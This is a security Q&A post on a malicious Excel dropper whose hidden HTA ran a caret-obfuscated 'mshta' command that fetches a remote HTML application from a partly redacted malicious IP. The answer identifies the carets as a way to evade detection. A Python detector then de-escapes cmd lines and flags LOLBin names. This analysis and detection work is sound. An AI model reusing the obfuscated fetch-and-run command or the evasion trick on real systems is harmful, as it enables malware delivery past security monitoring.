
I found a malicious Excel file that was using an embedded HTA program as its dropper to download a PowerShell program from a malicious IP. The dropper was on a hidden sheet in the file. After reviewing the output in the sandbox I found that the syntax in the command line made use of the ^ character. Why?

C:\Windows\SYSTEM32\cmd.exe
cmd /c m^sh^t^a h^tt^p^:/^/8x.xxx.xx.xxx/pp/aa.html

Then the following command was:

mshta hxxp://8x.xxx.xx.xxx/pp/aa.html

So, it was using HTA to call mshta.exe, but why that syntax in the command line? Is that valid, a sandbox error, or an attempt to get around security monitoring tools/antivirus software?

schroeder
QOHEN

1 Answer


That is likely an attempt to evade security software and/or signature-based detection. The caret character (^) is used as an escape character in batch scripts/cmd. When used before a normal character, it is effectively just ignored. This is a common obfuscation technique used by Windows malware.

nobody
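As an added example (not part of the question or answer above), here is a small Python normalizer that undoes cmd.exe caret escaping the way the cmd parser does and then flags command lines in which a LOLBin name such as mshta only becomes visible after de-escaping. The sample command lines are constructed from the one in the question plus two benign controls, and the LOLBin list and the caret threshold are assumptions chosen for illustration, not a vendor signature.

```python
import re

# Constructed samples: the obfuscated line from the question, a legitimate
# use of the caret (escaping a redirect), and carets inside double quotes.
SAMPLES = {
    "obfuscated": 'cmd /c m^sh^t^a h^tt^p^:/^/8x.xxx.xx.xxx/pp/aa.html',
    "benign_escape": 'cmd /c echo a ^> b',
    "quoted": 'cmd /c echo "m^sh^t^a"',
}

# Hypothetical starting list of binaries worth catching once de-obfuscated.
LOLBINS = ("mshta", "powershell", "rundll32", "regsvr32", "certutil",
           "wscript", "cscript")


def cmd_unescape(cmdline: str) -> str:
    """Reverse cmd.exe caret escaping.

    Rules implemented (matching cmd's behaviour outside double quotes):
      ^X        -> X          (the caret is dropped, X is taken literally)
      ^^        -> ^
      ^<newline> -> line continuation, both characters dropped
      trailing ^ -> dropped
    Inside a double-quoted region cmd treats ^ literally, so it is kept.
    """
    out = []
    in_quotes = False
    i, n = 0, len(cmdline)
    while i < n:
        c = cmdline[i]
        if c == '"':
            in_quotes = not in_quotes
            out.append(c)
        elif c == '^' and not in_quotes:
            if i + 1 < n:
                nxt = cmdline[i + 1]
                if nxt != '\n':          # ^<newline> joins lines, emits nothing
                    out.append(nxt)
                i += 1                   # consume the escaped character
        else:
            out.append(c)
        i += 1
    return ''.join(out)


def caret_count(cmdline: str) -> int:
    """Count carets that cmd would actually treat as escapes (outside quotes)."""
    count, in_quotes = 0, False
    for c in cmdline:
        if c == '"':
            in_quotes = not in_quotes
        elif c == '^' and not in_quotes:
            count += 1
    return count


def hidden_lolbins(cmdline: str) -> list:
    """LOLBin names present after de-escaping but absent from the raw string."""
    raw = cmdline.lower()
    clean = cmd_unescape(cmdline).lower()
    found = []
    for name in LOLBINS:
        pattern = r'\b' + re.escape(name) + r'\b'
        if re.search(pattern, clean) and not re.search(pattern, raw):
            found.append(name)
    return sorted(found)


def is_suspicious(cmdline: str, caret_threshold: int = 3) -> bool:
    """Flag a line if de-escaping reveals a LOLBin, or if it is unusually
    caret-heavy (threshold is an assumed tuning value, not a standard)."""
    return bool(hidden_lolbins(cmdline)) or caret_count(cmdline) >= caret_threshold


if __name__ == "__main__":
    for label, line in SAMPLES.items():
        print(f"{label:14} carets={caret_count(line)} "
              f"hidden={hidden_lolbins(line)} suspicious={is_suspicious(line)}")
        print(f"{'':14} normalized: {cmd_unescape(line)}")
```

Running it on the question's command line yields `cmd /c mshta http://8x.xxx.xx.xxx/pp/aa.html` with seven escapes and `mshta` listed as hidden, while the two controls are not flagged: the single `^>` is a legitimate escape, and the quoted carets are literal to cmd, so stripping them would be wrong. The caret is only one of several cmd.exe obfuscation layers (environment-variable substring expansion is another), so in a detection pipeline treat this as one normalization step before matching, not as a complete de-obfuscator.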